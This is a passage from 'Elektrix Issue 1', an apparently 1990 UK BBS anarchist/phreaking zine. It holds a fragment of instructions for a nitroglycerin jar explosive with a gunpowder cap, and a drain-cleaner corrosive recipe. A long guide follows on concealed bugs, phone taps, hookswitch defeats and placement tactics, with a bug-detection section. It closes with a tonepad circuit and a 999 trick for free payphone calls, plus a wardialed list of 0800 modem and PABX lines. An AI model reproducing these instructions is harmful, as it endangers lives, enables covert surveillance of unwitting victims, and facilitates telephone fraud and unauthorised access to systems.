- detonators. But saying that gunpowder still works well.....
-
- An idea (never tried it but worth a go):
-
- Try putting this lot in a jar with a fuse hanging out........
-
- ____
- ------------| | | -------- Nitroglycerin (not to scale)
- Fuse |__|_|
- (made with
- fuse paper) |
- |
- |
-
- Gunpowder (used as detonation cap)
-
-
- DO THIS IN A VERY ISOLATED PLACE.......LIKE AN ISLAND OR A FOREST....SINCE
- THE EXPLOSION IS * VERY * LOUD AND * VERY * WIDESPREAD.
-
- *** YOU ONLY NEED A FEW DROPS TO MAKE A DECENT EXPLOSION!!!!!! ***
-
- If you want to know about more stuff to use your Nitroglycerin for then you
- can contact me on Palm Beach BBS +44(303)-265979 as Deceptor.
-
-
-
- HOT STUFF
-
- Don't really know what to call this other than 'HOT STUFF' - it gets bloody
- hot and it eats away at Aluminium in seconds (well almost! heh).
-
- 1) Just go to the supermarket and buy some 'DRAINO' or stuff for unblocking
- drains.
-
- 2) Make sure it's the powder one and take out all the bits of metal. Then
- mix the leftover powder with water to make a hot and steaming liquid.
-
- The mixture will then eat at aluminium, etc and really nicely - It doesn't
- like bicycles....they tend to disappear after a while.
-
-
-
- That's it for this Issue of Elektrix.....Stay in tune for Laser Weaponry....
- Detonators.....Rocket Launchers......Grenades......and more in the next!
-
-
- TO JOIN THE ANARCHISTS UNDERGROUND MAIL ME AT PALM BEACH
- ONLY COMPETENT ANARCHISTS NEED APPLY (DECEPTOR)
-
-
- -------------------- Palm Beach BBS ++44(303)-265979 -----------------------
-
- ----------------------------------------------------------------------------
- | |
- | ELEKTRIX Issue 1 - Part 3 |
- | ~~~~~~~~~~~~~~~~~~~~~~~~~ |
- | |
- | A discussion of Electronic Surveillance techniques |
- | by The Technic |
- | |
- | PALM BEACH BBS UK ++44(303)-265979 |
- | |
- ----------------------------------------------------------------------------
- Electronic Surviellance
-
- Who'd bug me? I hear you ask what for, well just remember that with teh
- introduction of EPSS in teh sattes and System X over here every call has a log
- and that log contains who you called, where it was from and how long. In a rec
- article in the Guardian it pointed out that BT and the police kept 40 people
- "Under Surviellance" for 9 months before actaully arresting them for telephone
- fraud. Still think no-one wants to bug you?, well later on there are some hand
- tips to detect thses bugs but first you need to know what they are:
-
-
- Body Mics.
-
- These are just mics which are concealed on the body, then hooked up to a
- transmitter or a recorder. These range from flat microphones taped to the skin
- or tieclips, cufflinks, wrist watches whatever you need.
-
- Condenser mics need their own power as they modify the power in accordance wit
- the sound so results in thicker leads.
-
- Range: Small and can pick up a lot of background noise
-
- Conditions: Close contact, quiet - good for conversations etc.
-
- Cost: Relatively cheap.
-
-
- Contact Mics. Spikes. Tube Mics.
-
- This allows the eavesdropper to listen in on someone in the next room, they
- come in several types.
-
-
- Contact Mics
-
- These mics respond to vibrations in a sounding board like a door, and are
- available as pickups for guitars etc. The sounding board can be a door, a
- window, or a thin wall and only need to be pressed or glued to the board.
- As the wall gets thicker it is harder ( if not impossible ) to use a contact
- mic. this can be solved with ....
-
- Spikes
-
- A spike is a spike of hardened steel which is hammered into the wall and nearl
- comeout at the other end - but not quite, then a microphone is mounted on the
- spike which will pick up the vibrations from the next room.
-
-
- Tube Mikes
-
- These are simply microphones in a sealed box with a small plastic tube
- protruding from it. Then connect the mic to an amplifier and then stick the
- tube where u want (a keyhole) and then listen. You can drill a hole in the wal
- or use the back to back sockets in hotels, if drilling make sure that no bits
- plaster fall off - common method of detection.
-
- Range: Next room or can be used with a transmitter
-
- Conditions: Just needs to be close
-
- Cost: The mics are cheap but the radio bugs and associated equipment can be
- expensive
-
-
- Small Directional Mics.
-
- These are designed to be used at short distances and directional so they can
- pick up a conversation. Can be mounted in a briefcase or in a pen etc. and mus
- be aimed at the target - the briefcase one can be conected to a tape recorder.
- Pen or sleeve types can be connected to a pocket recorder. A variation is a MI
- mounted in a small bell shaped object and is held in the hand, then you walk i
- front of the trget and they will not suspects anyone following from the front.
-
- Range: Small and can pick up a lot of background noise
-
- Conditions: Useless in a crowded street, or with something between target and
-
- Cost: Relatively cheap.
-
-
- Shotugn, Machine Gun, Rifle Mics.
-
- These are long distance directional microphones, and often have handles and
- can resemble guns ( be careful when aiming one of these at someone as they
- might think it is a gun and you might not be wearing a bullet proof vest).
- These are then hooked up to an amplifier or tape recorder, swing from left
- to right and stop when sound is loudest. These can be difficult to conceal
- and difficult to aim, also without a frequency analyser to level out sounds
- any background noise can drown the conversation.
-
- Range: can be several hundred feet Conditions: calm weather and quiet
-
- Cost: expensive with amp and accesories
-
- Parabolic Mics.
-
- These are very like rifle mikes, usually a large circular metal or plastic dis
- which reflects sound to a microphone mounted in the centre of the dish. They
- are not as sensitve as rifle mics. but are a lot cheaper, they are bulky thoug
- and difficult to hide. You can hide a rifle mike under a long coat but not a
- dish unless your a woman who happens to be pregnant. Can use bird song
- recording as a cover - with a bird book in your pocket etc. tweed jacket.
- Condenser or Crystal mics best for long range devices, output is usually highe
- than dynamic mics. These can be bought anywhere - cheap.
-
- Range: can be several hundred feet Conditions: calm weather and quiet
-
- Cost: expensive with amp and accesories
-
- Like rifle MIC.
-
-
- Radio Bugs
-
- This is a small transmitter with a microphone. The devices can be combined to
- perform as a reciever and a microphone ( used in mind reading acts ). They are
- broadly split into two types - those which power them selves and those which
- draw power from some source. Bear inmind the size also has to include the
- antenna which can be several inches long. There is a problem of signal drift
- which can be overcome with a crystal control - but this requires more power.
-
- If they are not diguised they can be a dead give away ( they reciver doesn`t
- need to be disguised as the bugs can be tuned to operate on FM (VHF) or AM so
- just listen in your radio or car radio), to get around this several novel
- methods of disguise have been used.
-
- Martini Olive Bug
-
- This is designed to look like an olive on a cocktail stick, the transmitter
- is the olive and the antenna the stick. Range about fifty feet and can functio
- happily at the bottom of the glass.
-
- Sugar-Cube Bug
-
- This has two audio frequency circuits and three radio frequency circuits.
- Sealed in a protective silicon shell designed to resemble a sugar cube. Can
- transmit while at the bottom of a cup of coffee.
-
- Pen Bug
-
- Ball point or fountain pen and switched on by twisting the barrel or removing
- the cap and placing on the other end and they write.
-
- Calulator Bug
-
- Transmitter is built into a popular calculator which will function normally
- and can draw power from the calculator battery.
-
- Plug Bug
-
- Looks like a standard 13 amp plug but has a transmitter whihc has own battery
- or can draw power from mains. Also can use earth wire as antenna.
-
- Adaptor Bug.
-
- Works like an ordinary plug but transmitter built in , can use mains power.
-
- Light Switch Bug
-
- Built into the back of a rocker type light switch and draws power from mains
- supply - two models available - one which is on all the time and one which
- transmits only when the light is on.
-
- A problem with all these bugs is the limited battery life, there are several
- methods of extending battery life. Vox activated - these have a preset level
- at which they will switch on and a delay when they stop (so they dont stop whi
- there is a gap in a sentance) but because of the switch the bug is bigger.
- Another method is to incorporate a timer circuit and this will turn the bug
- on and off when set ( digital watch technology) can be set 9-5 when people are
- in offices. A more expensive way is to use a radio controlled bug, a coded
- signal is sent to activate the bug and then it switches off after two minutes.
- Very expensive though.
-
- HOMERS
-
- These are radio transmitters used to track someone, it is simply a transmitter
- which sends high powered pulses and a reciever picks them up as a series of
- beeps, the transmitter is usually the size of a cigarette packet and has a sho
- rigid aerial sticking out and a couple of powerful magnets to hold it onto the
- car. The receivers depend on what you can afford, simplest is one with no
- direction capabitlity and relies on volume - the closer you get the louder it
- gets. Then there are those which indicate direction , this can be a vertically
- mounted loop aerial or a pair of aerials on on each side of the vehicle. When
- you pick up the sound turn until it is loudest then you are in the same plane
- as the homer then you can gauge how far away by the speed of the beeps ( the
- faster the closer) this plane can be behind you as well as in front though.
- Some extra features are range control - you switch as you get closer e.g
- 1st settings beeps until a continuous tone then within 6 miles, then 2nd setti
- this goes into a continuous tone within one mile etc. Another feature can be t
- null switch , if the target is directly in front or behind you there is no sou
- if the target moves left or right you will get a tone ( different for left and
- right). Doppler shift recievers will tell you in which direction the target i
- moving but its expensive.
-
- Homing people can be done by incorporating the homer into a card ( business or
- credit, make sure its think or coloured so the electronics can`t be seen) but
- you canot have a battery so it relies on the radiation given out by Tv sets an
- radio`s and other electrical appliances and converts them into a series of bee
- They are only suitable for close work.
-
- Laser Bug
-
- This is rather like a contact mike as it relies on the vibrations produced by
- sound on the window, it reflects light waves and when they hit the window they
- will be modulated slightly. Feed a pulsed power supply to a laser and direct t
- beam at the window and some of this light will be reflected back, use a good
- astronomical telescope to focus the light and then it passes through a pinhole
- and onto a photomultiplier tube. The tube and its electronics detects variatio
- in pulse width and translates them back into sound. Infra red can be used, but
- you will have to use an ordinary light source to target it. Another way is to
- use cd lasers to pick up conversations and transmit them to a receiver miles
- away but you will have to line it up VERY accurately. It is also hard to detec
- or stumble across accidently.
-
- Infra Red Transmitter
- This can transmit up to 500 metres and is similar to a radio bug, the bug
- must be by a window though and a special reciever is needed ( maybe in a camer
-
-
- Telephone Tapping
-
- Tapping telephones can be done several ways and each relies on different
- equipment.
-
- Inductive Tap
-
- Induction microphones are very cheap and be bought anywhere , they are a
- couple of inches long and about half an inch across (cylindrical), it has two
- wires coming out of one end and a sucker on teh other end. The wiring can go t
- a tape recorded or an amplifier, obviu\ously this can`t be used but there are
- mics which are disguised as pads or other desk objects, in most cases a minatu
- amplifier is needed. Another type fits over the phone line and alos houses a
- transmitter also it doesn`t cut into the cable although the sound is weak.
- Alos note that they can be detected if a radio transmitter is built in and the
- can pick up humming from electrical devices.
-
- Radio Tap
-
- These are transmitting bugs specifically designed for use with phones. The mos
- common device in the ...
-
- Drop in Mike
-
- This is so called as in america the microphone just had to be unscrewed and th
- new transmitter dropped in. It draws its power from the phone and needs no
- maintenance. It acts like a normal microphone and transmits all conversations.
-
- Series an Parallel
-
- The obvious difference between these is the way in which theuy are connected t
- the phone line, the parallel is connected over both lines whereas the series
- is connected over one, they can both incorporate a small transmitter.
- The Parallel bug can be line or battery powered, but you can get the best of
- both worlds by having them trickle charged - it draws minute quantities and is
- difficult to detect via a meter. Battery powered versions are said to have a
- better range and they operate all the time so could lead to detection. No
- wires have to be cut to install this bug.
- The series bug is more common and cheaper, it can be batery or line powered b
- will only transmit when the phone is in use - this makes detection difficult.
- The line powered versions are smaller , about an inch square and half an inch
- think - hiding it in a phone or junction box is easy.
-
- Third Wire Bug
-
- These bugs are connected in paralleland normally line powered although a
- rechargable battery version is available. Average size is around 1 and half
- inches by half an inch, it operates like a prallel bug but when not in use
- switches to its own internal microphone and transmits souns from the room,
- this is reputedly favourite amongst USA law enforcement agencies.
-
- Infinity Transmitter
-
- These are around the size of a third wire bug and are the most exotic type of
- bug. They cannot monitor telephone conversations but the device is line
- powered and can be connected anywhere along the phone line ( or inside the
- phone) the person calls the target and then sends a tone down the line which
- activates the Bug. The tone is matched to a reciving unit in the bug and thus
- they are also known as Harmonica bugs. The bug cancels the bell of the
- victim's phone and uses an internal mic or the phones mic to send the room
- conversation down the line - note that these cannot be used wher ther is a
- switchboard due to the direct dialling technique. There are several variaitons
- of this bug - One device waits for the eavesdropper to dail and then expects a
- tone immediately this cancels the bell so it doesn't even ring. However the
- bell could ring and alert the victim. Another device waits for the victim to
- answer and then says he has a wrong number, when the victim hangs up the
- device is activated. Another device automatically cuts out the handset if the
- phone is lifted so operates normally, some cut off after a certain amount of
- time, some incorporate an led so that installation is easy as the light will b
- on if installed correctly. They don't need batteries or further attention
- once installed. They are very difficult to detect and even the phone company
- can miss it if its off.
-
- Hookswitch Defeat
-
- This is the switch the handset is dropped onto, by defeating this the micropho
- will still be activated and you can listen in. The defeat can be done by a
- resistor connected across the switch - an amplifier would be needed on the
- listeners side as the volume level will be low. The method is to call up say
- that you have a wrong number and then don't hang up when he does, then listen
- Although this can work for anyone else too so some are remote controlled. (ton
- or radio activated). They are hard to detect and cheap, ( can`t detect as its
- only one component).
-
- Drop Out Relay
-
- These are widely available and are just electronic switches which switch on
- whenever the phone is in use. Some have their own batteries or line powered
- and can activate taperecorders etc. by the raly - just clip on and put the
- other lead in the tape recorder. They are easy to install and can be used
- legitimately.
-
- Lost Transmitters
-
- This is a bug which is designed to blend in with the electrical components
- - they are wired into the circuit board and transmit whenever it is in use
- and will pick up sounds from the room. These are very expensive if one is foun
- this means you are dealing with some very nasty people.
-
- Direct Tap
-
- All you need is a pair of high impedence head phones and connected to the line
- via crocodile clips with a capacitor in between to keep out the phone companie
- electricity. There are many disadvantages as it is very easy to spot and when
- installing and produce clicking noises on the line. A higher voltage will pass
- through the lines or terminals and this can be detected by a meter or bulb, th
- headphones can be replaced by a tranformer and then to a tape recorder.
- Excellent Quality.
-
- Ok so there are the bugs now how the F**K do you find them!
-
-
- BUGGING - Guidelines
-
- Stick to these if possible, use own judgement in special situations.
-
- Situation Device Used Remarks
-
- Rural Rifle,MIC. Bulky, difficult to conceal,
- Location Parabolic mic. need little background noise
- and good weather.
-
- Urban Small Directional Difficult to operate in
- Location MIC. crowded streets. Background
- noise a problem.
-
- Vehicle Radio bug, Am- FM Power a problem unless
- VHF, connected to car power.
- Can pick up interference fro
- vehicle electrics, effecienc
- will fluctuate as receiver
- will have to follow close
- behind.
-
- Tape Recorder Normally lots of space in ca
- ( dash, under seat ), but ne
- change tapes. Quality and
- reliability excellent.
-
- Restaurants etc. Concealed directional Easy to use, good quality,
- Mike. Get close to target. Table b
- wall - less background noise
- use less against noisy room.
-
- Offices/Rooms Tape Recorder Difficult to conceal and nee
- with access. regular access - excellent
- quality.
-
- Wired Mic. Range limited to length of w
- can be time consuming to
- install - may lead to detect
- no further attention after
- installation. Quality very
- good.
-
- Radio Bug Battery type have a limited
- life but more flexible in
- installation. 100 yard range
- quality can be very poor.
- use VOX ( voice activate) to
- reduce detection.
-
- Hookswitch Defeat Open telephone MIC. room
- conservation carried down li
- Resistor, capacitor or diode
- can be used.Can be missed by
- physical search. Works Well.
-
- Office/Room
- Without access Contact Mic. Easy and quick, install on
- window, door, or wall. Good
- results depends on thickness
- of wall ( sounding board ).
- Difficult to detect.
-
- Tube Mic. Can be pushed through cracks
- wall, through keyholes, unde
- doors, in back to back socke
- installation canbe noisy
- (drill holes), work well.
- Very difficult to detect.
-
- Spike Mic. Noisy and difficult to insta
- but can work well. Difficult
- detect. But can be detected
- metal detector.
-
- Infinity Transmitter Fitted easily along phone li
- carries conversation anywher
- works, good quality and hard
- to detect.
-
- Laser Bug Safest way, but expensive.
-
-
- Telephone Tapping
-
- Type Remarks
-
-
- Direct Tap Simple to install, especially at terminal box,
- Headphones can be used, or drop out relay and recorde
- Very good quality.
-
- Inductive Tap No connections needed, easy to install but has to be
- close to phone, needs wiring to transmitter - can be
- easy to detect. Quality is poor.
-
- Series or Parallel Can be connected anywhere along the line or concealed
- Tap in phone or junction box. Transmits phone conversatio
- to receiver, poor quality ( as in radio bug) but can
- power from line or battery.
-
- Third Wire Bug As above but transmits romm conversation when phone n
- in use.
-
- Lost transmitter Made to blend in with background of electronics
- components - expensive, dificult to fit but equally
- difficult to detect.
-
- Drop in Bug Simple to install and some difficult to detect by
- physical search. Needs no attention and is reliable.
-
-
- Detecting
-
- 1. Physical search - start outside the house and walk slowly around it and
- examine eveything carefully, look for any wires going int
- Outside House the walls and make sure you know what they are for and
- follow them back to the pole etc. look for wires spliced
- into the cable, particularly in the top of the pole. Ther
- may be an inspection hatch if the cables go under ground
- so try and lift and inspect it. If in a large building
- look in the terminal box for any wires across terminals i
- anything suspicious is found then call the company. While
- walking outside examine the windows ( frames as well) loo
- for signs of disturbance.
-
- Inside House Examine ALL furniture, check backs and drawers, wardrobes
- etc. Look under beds - under the fabric underneath, look
- for holes, bedrooms are favourite. Standard bugs have a w
- trailing from them, and a battery on the outside. Don`t
- forget all the disguised bugs and any household ornaments
- remnove green felt or feel underneath for holes.Ask where
- all objects came from, look at all pictures and frames ma
- sure they haven`t been tampered with . Examine walls,
- ceilings and floors, also curtains and pelmets, roll back
- carpets and examine floorboards. Anything suspicious then
- take up the floor boards and have a look. Look for any
- suspicious wires tucked under the edges of carpets. Alway
- examine ceilings from above if possible, especially in
- bedrooms, wear overalls. If only from below have a look
- at flaking paint in walls and ceiling and look for mis-
- matched areas of paint. Examine any holes but check for
- electrical wires etc. first. Houses and apartments with
- party walls have problems, the best way to see these is t
- check for flaking paint or small holes. Don`t go round to
- neighbours whenn found - they aren`t going to let you in
- they have bugged you. You can dig away at the wall and kn
- the spike out. Holes for tube mikes can be blocked up wit
- plaster filler effectively knocking it out. Switch off th
- mains and look at light sockets ( unscrew ), and look for
- any extra components. With the power unscrew the ceiling
- roses and take a look inside, also any other light
- fittings.
-
- The telephone Pickup the handset and unscrew, examine the telephone
- thoroughly, small bkack cubes with wires are trouble, che
- the hookswitch action, make sure it shuts off the mic,
- examine all wires thoroughly and see where they go, check
- to see if any are thinnner or thicker and if they use pro
- terminals or not. Put phone back together and check junct
- box, look at terminals and check telegraph pole and the
- junction box at the top.
-
- 2. Electrical First use metal detector,check walls, celings, floors any
- pipes will run in a straight line , helpful to know where
- the pipes etc. run Check any ornaments with the detector
- shake ornaments and check weight, look at base for holes
- covered with filler.
-
- If no equipment use VHF radio and turn control to see if
- any screech happens, put next to phone if screech then th
- line bug, make a call and test again , check junction box
- same way, Use tv with indoor aerial, make a loud noise an
- turn tv down and tune tv - if a bug then horizontal lines
- appear which wil jump to the music - nearer the bug large
- the jump, - this will pick up the bug ( if VHF) from a
- distance away , send the sound source to several adjoinin
- rooms to detect bugs further away. If found carry on onto
- rest of bandwidth, get someone to make a call and check
- again. examine terminal box - voltage between terminals
- should be 46-50v if lower may be a bug in parallel, infin
- drop till under 10, lift handset measure voltage 2-12v. i
- higher then something connected in series (series bug).
- Open phone and check microphone terminals - hold down hoo
- switch and if voltage across mic then hookswitch defeat e
- Check volts across terminal while sending tones down line
- Examine car, underneath for homers, look at woring for
- splicing and under dash, feedback search,
-
- Deterrence Paint a thin stripe of nail varnish across gaps, tighten
- screws then undo by a quarter or 3/4 then make a note of
- where the slots and the screws are. Apply to junction box
- too. Check all people coming in and restrict entry - watc
- at all times. If to toilet go to bedroom and find summit
- do. If bug found hold a bait meeting to lure eaves droppe
- If not return to bug and drain bettery so has to replace.
- if bug reconnect wire several times while making a call,
- series jiggle the hookswitch and then cut off bug.
-
- Training Use labur force, Carbon ribbons just dumped in bin wherea
- documents shredded. Short hand pads left in drawer docume
- locked away. People wander around freely - ask who - if
- be careful of security etc. car phone a big risk and
- portable or freeway wireless ones. use phones far away fr
- hotels etc. use different tables at restaurants etc. lase
- bug prevent heavy curtains blinds etc. and clean windows
- ( dirty ones reflect more) - itemised phone bills, cellul
- radio - big brother - easy to detect, satellite,
-
-
-
- Detecting Bugs
-
- This can be quite cheap and easy.
-
- Field Strength Meter
-
- This is bascially a crystal radio set connected to a meter instead of a speake
- It shows the power output of any transmitter in the vicinity and is sold as an
- aid to ham radio operators. The sensitivity is low so detection should not be
- further than 12 inches away from the bug. If it does detect something the need
- will swing across so the furthest swing will be closest to the meter. A proble
- can be that they will react to a passing polics car or a commercial radio
- station. If one is bought with a receiver circuit then it is tunable so you ca
- tune into the frequency of the bug. Also an amplifier can aid detection.
-
- Feed Back Detector
-
- When a transmitter gets to close to a receiver then feedback is produced ( if
- at the same frequency). This type of detector relies on feedback and is couple
- to an amplifier and a receiver circuit. When using these you will need a noise
- for the bug to transmit ( singing etc.) ,Then you simply scan through the
- frequencies and if there is a bug transmitting you will get a squeal as the
- detector hits the same frequency.
- The Feedback detector generally has a further range but can tip off an
- eavesdropper because of the noise.
-
- Telephone Analyser
-
- This is expensive equipment which will carry out a series of tests on a phone
- line semi automatically. These are particularly useful when dealing with
- complicated phone set ups like a switchboard. Tracing an individual pair of
- wires without one of these can be tedious.
-
- The tests actually carried out vary from machine to machine, they usually come
- in attache cases and are battery powered. The first test will be to measure th
- voltage across a phone line when the phone is on and off the hook. If the volt
- is lower than it should be it may be a bug. If the voltage at the mic is too h
- then it could be a bug. There is no difference between this and an ordinary vo
- meter. The next test is a tone sweep, the analyser sweeps through the spectrum
- and then if anything which reacts to a tone is on the line it will reduce the
- voltage on the line and the analyser will detect this, stop and give you a
- warning.
-
- The next test is high voltage pulsing a charge is built up then fired down the
- line, some hookswitch defeats use a change of voltage to trigger them, if
- a hook switch is activated the analyser will pick up the voltage of the
- microphone and the alarm will go off.
-
- Another test is audio listening, the operator will listen to the line and an
- acoustic generator is switched on. If the operator hears a tone down the line
- then some osrt of hookswitch defeat is in operation, this method can also dete
- infinity transmitters as any noise will be transmitted down the line which the
- operator will hear. Each individual wire is tested against each other to see i
- the sound from the generator is being transmitted down the phone line. (n.b.
- tone has to be around voice frequency).
-
- Any good analyser wil test al these any may even test for conductive paint on
- casing being used.
-
- Spectrum Analyser
-
- This sweeps entire frequency bands in the same way as a field strength meter
- searches for radiation. A typical sophisticated Spectrum Analyser can sweep
- between 20 kilohertz and 2000 megahertz. Some can do this all in one go or in
- separate plug in modules. It should carry out the scan automatically and when
- it detects a transmission it will stop and display the frequency, and the
- strength of the signal on a field strength meter and let you listen to the
- transmission on an internal speaker. Some analysers have a cathode ray tube
- as an oscilloscope to display the waveform and even buy another CRT which show
- the frequency versus amplitude of demodulated components of the primary signal
- such as subcarriers, and a second frequency indicator for the subcarrier.
-
- You can pick up a spectrum analyser which detects RF radiation including singl
- sideband, pulse width transmissions and those with the carrier wave removed, o
- a very wide band coverage.
-
- Cable Checkers
-
- This is just a portable metal detector to see where mysterious wiring is going
- they can be bought anywhere. Also a screamer is available which will detect
- whther there is a microphone on either end and the MIC will emit a loud noise
- and so can be located. Also you can use an inductive mic and an amplifier to
- check to see if anything is on the line.
-
- Detectors can be built using a field strength meter and replacing it with a
- led, some have a sensitivity control.
-
- Another way to detect a bug is to install a telephone watchdog which detects
- the resistance or capacitance of the line, if anybody cuts in or installs a bu
- the devices led will go on - this will only respond to change so any bug on
- already wil not be detected.
-
- Scramblers - simple scramblers are available, but so are descrambler`s. The
- more expensive scramblers alter the frequency and parts of speech around 650
- to 750 times a second. These can virtually defeat any attempt to descramble,
- except of course the american security agency.
-
- Jammers - these are simply wide band transmitters which transmit white noise.
- these will also jam tv`s radios etc....Another jammer uses two high frequency
- transmitters and will cause any microphone to squeal at the difference between
- the two. Another magnetically induces an intense noise in the handset micropho
- which will block any infinity or hookswitch defeats. Any contact mics can be
- jammed by buzzers or vibrators stuck to the window or sounding board.
-
- THE detector - all bugs use at least one semi conductor, if an ultra high
- freqency carrier wave is emmited it will be radiated back by the bug. This
- radiation will contain strong harmonic components - ( a harmonic is a componen
- where the frequency is an exact numerical multiple of the fundamental or
- strongest frequency. This strongest frequency is the first harmonic, twice the
- frequency is the second harmonic and so on.). Other objects will only radiate
- back to the second harmonic and only a semi-conductor junction will produce a
- third harmonic. A small UHF transmitter and a reciver tuned to the third
- harmonic is all that is needed ( use like a field strength meter), the radiati
- emitted back will be minute so teh detector will be expensive and have to be v
- close to the bug.
-
-
- --------------------- Palm Beach BBS - +44(303)-265979 -----------------------
-
- ----------------------------------------------------------------------------
- | |
- | ELEKTRIX Issue 1 - Part 4 |
- | ~~~~~~~~~~~~~~~~~~~~~~~~~ |
- | |
- | Make your own Tonepad for Phone Box phreaking |
- | by Maxhack |
- | |
- | PALM BEACH BB UK ++44(303)-265979 |
- | |
- ----------------------------------------------------------------------------
-
- The Technique
-
- Some weeks ago free dialling with tonepads came to the news in a daily
- newspaper. Since then there has been much in the way of media hype covering
- these devices in computer magazines and hackers files. This file will, I
- hope,make the whole practise clear and the method easy and also less costly
- than previously.
- The way it works is as follows: The technique will ONLY work from phone
- boxes contrary to what you may have been told. You may also find that it is
- not working on some London phone boxes - this is due to the fact that many
- have been modified to disallow phreakers from using the method.
- The technique relies on the fact that dialling 999 on a phone box auto-
- matically disconnects the charging mechanism whilst the call is being made.
- The tonepads which allow people to make free calls are just portable models
- of the tone-dialling telephone circuits that are in your telephones and in
- modern modems. The tones they generate are perfectly 'legal' and are simply
- used in portable units for Computerdial services (Share price indexes,etc.)
- for travelling businessmen and other groups who may use such services (like
- voice mail or whatever). All you do is the following:
-
- [1] Go to a phone box.
- [2] Dial the number you wish to connect to using the keypad.
- [3] As soon as the phone starts ringing dial 999 on the phonebox machine as
- fast as possible. This will have cut the charging mechanism and you will
- have a free call.
-
- * For boxes that have been modified......Simply put 10p in first then do *
- * it - you won't loose your money but you will still make a free call. *
- * This has to be done since they are modified so that they won't dial a *
- * number (except 999/linkline 0800/government) unless money has been dep *
- * osited in the machine.
-
-
- Method 1
- --------
-
- You can record the tones required to dial a number onto a tape and then
- play them down the telephone with a standard taperecorder. This has three
- main drawbacks however although it is the least costly method.
-
- 1) You will need to record a different set of tones for each number. So un-
- less you dial a few numbers repeatedly then you are going to find this
- method very tiresome. You'll need to have a DTMF modem/phone too.
-
- 2) The phone system requires that each tone is within 1.5% of the specified
- frequencies. This will prove to be difficult if you don't own very good
- recording equipment.
-
- 3) You will look very conspicuous playing around with a tape recorder in a
- phone box.
-
- Despite the disadvantages it has to be remembered that this method is the
- cheapest option open to you.
-
-
- Method 2
- --------
-
- This involves building your own portable tonepad (unless you want to fork
- out £12-50 for a Tandy one). The device is small, effective and relatively
- cheap.
-
- One method is as follows:
-
-
- [Battery] _______
- +9V --------|6 |----<14-----123
- | |----<13-----456 Numeric Keypad lines
- | |----<12-----789
- --------|16 |----<11-----*0#
- [Speaker] S | |----<3------'||
- --------|1 |----<4-------'|
- | | | |----<5--------'
- | --|15 7|---
- | | | X [3.579545 MHz Crystal]
- | | 8|---
- | -------
- GND TCM5087
- (-Ve on battery)
-
- That way is simple to build since few components are needed...get a keypad
- off an old remote controller or something...or make your own from Push-to-
- make switches. Other methods include using two 555s to generate the tones
- or two 8037s (wave form gen. chips) though this is a little too expensive
- for my liking and only needs more complex circuitry.
-
- If you intend to use 555s then you'll need a monostable on each 555 and the
- frequencies used are as follows:
-
- * - 941 & 1209 Hz
- # - 941 & 1477 Hz
- 0 - 941 & 1336 Hz
- 1 - 697 & 1209 Hz
- 2 - 697 & 1336 Hz
- 3 - 697 & 1477 Hz
- 4 - 770 & 1209 Hz
- 5 - 770 & 1306 Hz
- 6 - 770 & 1477 Hz
- 7 - 852 & 1209 Hz
- 8 - 852 & 1336 Hz
- 9 - 852 & 1477 Hz
-
-
- -------------------- Palm Beach BBS ++44(303)-265979 -----------------------
-
- ----------------------------------------------------------------------------
- | |
- | ELEKTRIX Issue 1 - Part 5 |
- | ~~~~~~~~~~~~~~~~~~~~~~~~~ |
- | |
- | Freefone interrogation - the ultimate listing |
- | by Agent 7 |
- | |
- | PALM BEACH BB UK ++44(303)-265979 |
- | |
- ----------------------------------------------------------------------------
-
-
- I have undertaken a massive dial through of LINKLINE (0800) numbers to be
- listed in this and forthcoming issues of ELEKTRIX. All were known to be in
- working order when this first issue went out - May 1990. Some you may have
- seen before - others you won't. I've simply collected all the known ones I
- could find which were still working and listed useful information for each.
- Since there seems to be much going on with Voice mailboxes, computerdial,
- test lines, and PABX hacking lately I have included these too with comments
- where appropriate as well as the standard modem lines. Since on occasions a
- great many numbers 'side by side' have been engaged at the same time I have
- included this since it may give clues to the nature of the line-use should
- you wish to pursue these.
- The ranges that I have dialled through myself have not always been in a
- logical fashion - but then it gets real boring dialling through 1000 dead
- numbers. So I try to vary it. But the results have been reasonable. If you
- have made any dials through 0800 or just modem wardials then please let us
- have the results so we can share them with others - it's also pointless two
- people dialling through the same ranges.
- I hope these lists bring you much fun! Regards Pop
-
- Key: node = (xxx---)
- number = (---xxx)
-
- Node info:
-
- 321 - This seems to be a test area for BT's latest projects (voicedial,
- computerdial, intelligent fax services etc.)
-
-
- node number results notes
- ---- ------ ------- -----
-
- 321 100 computerdial Announced as 'Remote Update', it
- requires 3 digit service codes.
- 101-109 no service
- 110 digital recording 'This service is no longer avail-
- able'.
- 111 digital recording 'Goodbye'.
- 112 digital recording 'Goodbye'.
- 113 digital recording 'Please press start on your fax
- + fax response machine'.
- 114-115 computerdial British Telecom Weather Centre.
- + optional fax With voice + fax forecasts.
- 116 digital recording 'Goodbye'.
- 117 digital recording 'This is 0800 briefing'.
- + fax response
- 118 computerdial Puzzleline test service.
- + optional fax
- 119 computerdial BTRL estate agency test service.
- 120 PABX computerdial In the form xxx. 580 - 0800 Brief
- Response#1 'That number is not
- listed.'
- Response#2 'That number was not
- specified correctly.'
- 121-123 fax response
- 124-126 PABX computerdial
- 127-129 fax response
- 130-139 rings and rings
- 140-141 No service
- 142 Engaged
- 143 No service
- 144 Engaged
- 145-146 No service
- 147 rings and rings
- 148-149 No service
- 150-179 Engaged
- 180-199 rings and rings
-
- 282 443 MODEM 2400 Does nothing
- 809 Weird Autoanswers then nothing
- 861 MODEM 1200/75
- 871 MODEM 1200 8/N/1 Does nothing
-
- 289 237 STRANGE TONES
- 384 Voice recording '45-55' - Weird
- 485 MODEM 1200/75
- 643 MODEM 2400 The old US dialout
- 783 MODEM 1200/75
- 817 MODEM 1200 7/E/1 Comes up with '+++ ? ERROR'
- CTRL-E gives '28301 DMLDN G'
- Enter SYS - gives '+++ STF GO'
-
- 456 100 Computerdial BT Service centre computerdial sys
-
- 521 509 MODEM 2400 Weird prompt
-
- 585 111 MODEM 1200/75 Cambridge PSS port - not connected
-
- 891 002 PABX Resource line DTMF then * code
- 004 AT&T CARD PABX Calling card service
- 831 MODEM 2400 Yale Direct login
-
- 898 058 PABX
-
-
- Uptodate list to be included in each ELEKTRIX issue.....
-
- -------------------- Palm Beach BBS ++44(303)-265979 -----------------------
-